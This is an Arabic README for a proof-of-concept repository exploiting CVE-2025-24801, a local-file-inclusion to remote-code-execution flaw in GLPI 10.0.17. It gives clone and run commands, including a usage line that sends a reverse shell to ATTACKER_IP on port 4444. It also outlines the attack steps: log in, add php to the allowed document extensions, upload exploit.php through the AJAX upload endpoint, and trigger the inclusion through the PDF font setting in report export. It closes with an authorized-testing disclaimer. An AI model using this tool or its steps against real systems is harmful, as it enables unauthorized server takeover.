
استغلال CVE-2025-24801
يحتوي هذا المستودع على سكربت إثبات المفهوم (poc.py) الذي يستغل CVE-2025-24801، وهي ثغرة LFI تؤدي إلى RCE في GLPI 10.0.17. يقوم السكربت بأتمتة ما يلي:
.php عن طريق تحديث إعدادات نوع المستندgit clone https://github.com/fatkz/CVE-2025-24801.git
cd CVE-2025-24801
pip install -r requirements.txt
python3 poc.py \
--url https://target.example.com/glpi \
--user TECHNICIAN_USER \
--password "PASSWORD" \
--lhost ATTACKER_IP \
--lport 4444
--url: عنوان URL الأساسي لمثيل GLPI (مثل https://example.com/glpi)--user / --password: بيانات اعتماد فني GLPI صالحة--lhost / --lport: عنوان IP والمنفذ الخاصان بالمهاجم لمستمع الشل العكسييستخدم السكربت تلقائيًا --doc-id 1 افتراضيًا لتحديث نوع المستند الأول.
بعد التنفيذ، سيقوم السكربت بما يلي:
.php عن طريق تحديث نوع المستند برقم 1exploit.php الذي يحتوي على حمولة شل عكسي PHPبعد ذلك، ستحتاج إلى تشغيل ثغرة LFI يدويًا عن طريق تحديد اسم الملف المرفوع في تضمين خط PDF (على سبيل المثال، عبر ميزة تصدير التقرير) لتحقيق RCE.
/front/login.php ويرسل بيانات الاعتماد للمصادقة./front/documenttype.form.php?id=1، ويحلل رمز CSRF، ويضيف php إلى الامتدادات المسموح بها./front/ticket.form.php للحصول على رمز CSRF، ثم يستخدم /ajax/fileupload.php (مع X-Requested-With: XMLHttpRequest) لرفع شل عكسي PHP.pdffont أثناء تصدير التقرير.هذه الأداة مخصّصة لاختبار الاختراق المصرّح به والأغراض التعليمية فقط. لا تستخدمها ضد أنظمة دون إذن صريح.
أُنشئت لأغراض تعليمية واختبار الاختراق المصرّح به.